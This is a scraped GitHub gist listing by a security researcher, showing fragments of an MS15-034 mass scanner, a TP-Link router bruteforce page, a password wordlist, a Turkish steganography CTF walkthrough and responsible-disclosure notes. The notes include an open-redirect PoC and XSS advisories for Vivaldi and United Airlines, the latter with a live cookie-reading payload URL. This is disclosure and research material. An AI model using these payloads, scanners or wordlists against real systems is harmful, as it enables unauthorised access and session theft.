Skip to content

Instantly share code, notes, and snippets.

View xsuperbug's full-sized avatar

Superbug xsuperbug

  • Superbug
  • Turkey
View GitHub Profile
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#define CANARY "in_the_coal_mine"
struct {
char buffer[1024];
@xsuperbug
xsuperbug / gist:a1f7cd1d3fa49efd8c70
Created February 4, 2015 13:28
baslarimboylestaja
1-İlk olarak bazı online resim analiz uygulamalarında şansımı denedim. Buralardan bi sonuç çıkmadı.
2-Ben de bu resmi google image de aramaya karar verdim. Resim bi çok farklı boyutta bulunmaktaydı (doğal olarak) ancak ben 400x475 olanı arıyodum.
3-400x475 resmi bulduğumda şaşırmıştım. Çünkü onun adı da "tux.jpg" idi.
4-Resmin bulunduğu web sitesini* görüntülediğimde linux tabanlı bir steganografi uygulaması (steghide) ile içine txt dosyası gizlendiğini gördüm.
5-Sanal makinada kullandığım linuxa bu uygulamayı kurdum ve aynen ordaki parametreler ile çalıştırdım.
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Bruteforce!</title>
</head>
<!-- http://www.tp-link.com/resources/simulator/TL-WR750N_V5.0/localiztion/str_menu.js -->
<body onload="detectFirefox()">
<h1>Bruteforcing TP-Link routers with JavaScript</h1>
@xsuperbug
xsuperbug / gist:22d34affd4161001c209
Created April 16, 2015 09:04
MS15-034 mass scanner
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import random
import time
dosya = open("liste.txt","r")
ipAddress=[]
for i in dosya:
ipAddr = i
hexAllFfff = "18446744073709551615"
@xsuperbug
xsuperbug / passwords
Created June 5, 2015 21:36
passwords
admin
test
secret
guest
1234
123456
demo123
demo
password123
password1
Zafiyet Hakkında
================
https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
Proof of concept
================
https://sso.tpo.com/members/edit?success_url=//google.com
Zaman Çizelgesi
@xsuperbug
xsuperbug / gist:21d9ed0b1747294d6e62
Last active April 12, 2023 15:02
TPO XSS Zafiyeti (Responsible disclosure)
Zafiyet Hakkında
================
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Proof of concept
================
Dosya yükleme modülünde uzantı ve içerik kontrolü yapılmadığı için sisteme zararlı içerik yeklenebilmektedir.
(Not : XSS zafiyetinin çalışması için bağlantıda değişiklik yapılmıştır.)
Dosyanın bulunduğu hatalı sayfa:
@xsuperbug
xsuperbug / gist:7046b8b9e6ba56dd9acb
Created November 3, 2015 07:08
Active Content Blocking Bypass via Data URIs in Vivaldi Browser
Name : Active Content Blocking Bypass via Data URIs in Vivaldi Browser
Software : Vivaldi Browser 1.0.83.38 (Developer Build) stable
Vendor Homepage : http://www.vivaldi.net
Vulnerability Type : Cross-Site Scripting
Researcher : Evren Yalçın <evren [at] superbug [dot] co>
Description
Vivaldi is a freeware web browser developed by Vivaldi Technologies, a company founded by former co-founder and CEO of Opera, Jon Stephenson von Tetzchner.The project's slogan is "A new browser for our friends", and the browser is aimed at hardcore technologists, heavy internet users, and previous Opera browser users disgruntled by Opera's transition from the Presto engine to Blink, which removed many popular features.
Details
Name : United Airlines XSS Vulnerability
Vendor Homepage : http://www.united.com
Vulnerability Type : Cross-Site Scripting
Researcher : Evren Yalçın <evren [at] superbug [dot] co>
Example PoC is as follows :
http://www.united.com/travel/checkin/start.aspx?SID=&sessionKey=0DA191E8-342A-4FBE-A511-21C8702546D4&gLanguage=0&pat=False&code=PNR_NOT_FOUND_BY_ETICKET_LAST_NAME"><svg/onload=confirm(document.cookie)>//&opt=ET&1=&2=&3=123123123&4=
----